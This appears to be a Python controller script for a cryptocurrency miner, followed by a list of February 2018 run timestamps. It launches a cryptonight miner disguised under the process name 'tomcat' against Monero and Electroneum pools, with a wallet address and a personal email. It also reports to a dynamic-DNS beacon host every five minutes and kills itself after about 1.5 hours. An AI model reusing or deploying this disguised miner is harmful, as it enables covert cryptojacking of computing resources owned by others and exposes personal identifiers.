import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:37:05.659569
#2018-02-17 16:23:06.210626
#2018-02-17 18:10:05.111862
#2018-02-17 19:58:04.106622
#2018-02-17 21:46:07.603544
#2018-02-17 23:31:06.867705
#2018-02-18 01:20:01.345825
#2018-02-18 03:07:05.585071
#2018-02-18 04:56:06.435872
#2018-02-18 06:49:05.012806
#2018-02-18 08:38:05.820726
#2018-02-18 10:24:07.115119
#2018-02-18 12:10:06.686245
#2018-02-18 13:56:04.956143
#2018-02-18 15:46:04.100607
#2018-02-18 17:35:07.293143
#2018-02-18 19:23:01.727938
#2018-02-18 21:08:06.140653
#2018-02-18 22:55:03.595221
#2018-02-19 00:43:06.980312
#2018-02-19 02:29:01.927773
#2018-02-19 04:16:01.802256
#2018-02-19 05:59:04.820989
#2018-02-19 07:48:01.759485
#2018-02-19 09:38:07.632460
#2018-02-19 11:28:06.771053
#2018-02-19 13:14:06.962760
#2018-02-19 15:03:06.344581
#2018-02-19 16:50:12.085110
#2018-02-19 18:38:05.841097
#2018-02-19 20:23:05.325022
#2018-02-19 22:11:07.540434
#2018-02-19 23:58:08.629287
#2018-02-20 01:45:10.054030
#2018-02-20 03:31:06.610895
#2018-02-20 05:18:04.041671
#2018-02-20 07:01:04.254755
#2018-02-20 08:46:08.736977
#2018-02-20 10:30:12.605802
#2018-02-20 12:16:09.290035
#2018-02-20 14:03:06.323049
#2018-02-20 15:47:04.729136
#2018-02-20 17:31:04.955509
#2018-02-20 19:19:08.538355
#2018-02-20 21:07:07.178767
#2018-02-20 22:52:01.556099
#2018-02-21 00:37:06.155395
#2018-02-21 02:23:05.481534
#2018-02-21 04:11:03.423254
#2018-02-21 05:58:01.294142
#2018-02-21 07:46:01.513110
#2018-02-21 09:34:03.987260
#2018-02-21 11:22:09.792807
#2018-02-21 13:12:04.294257
#2018-02-21 14:59:04.774026
#2018-02-21 16:48:02.207919
#2018-02-21 18:39:08.575961
#2018-02-21 20:25:04.869639
#2018-02-21 22:13:06.382746
#2018-02-22 00:04:06.179011
#2018-02-22 01:52:06.539834
#2018-02-22 03:39:06.481503
#2018-02-22 05:26:01.263042
#2018-02-22 07:11:01.417172
#2018-02-22 08:57:01.918626
#2018-02-22 10:45:07.999162
#2018-02-22 12:31:04.696390
#2018-02-22 14:15:10.598805
#2018-02-22 16:04:06.443091
#2018-02-22 17:49:08.314053
#2018-02-22 19:37:02.117807
#2018-02-22 21:28:07.304572
#2018-02-22 23:16:01.721480
#2018-02-23 01:02:04.103588
#2018-02-23 02:50:05.379278
#2018-02-23 04:37:06.355781
#2018-02-23 06:23:05.839518
#2018-02-23 08:11:08.747824
#2018-02-23 10:29:04.139555
#2018-02-23 12:21:07.583571
#2018-02-23 14:10:08.172752
#2018-02-23 15:59:05.650696
#2018-02-23 17:44:05.850535
#2018-02-23 19:31:06.657288
#2018-02-23 21:14:05.455846
#2018-02-23 23:02:05.788731
#2018-02-24 00:47:06.288506
#2018-02-24 02:37:01.872500
#2018-02-24 04:31:05.529754
#2018-02-24 06:16:06.577517
#2018-02-24 08:04:04.606450
#2018-02-24 09:48:01.684278
#2018-02-24 11:43:01.715178
#2018-02-24 13:35:04.738122
#2018-02-24 15:23:01.234420
#2018-02-24 17:12:07.373067
#2018-02-24 19:04:02.158257
#2018-02-24 20:52:04.694127
#2018-02-24 23:17:05.355826
#2018-02-25 02:42:01.399376
#2018-02-25 06:29:05.981063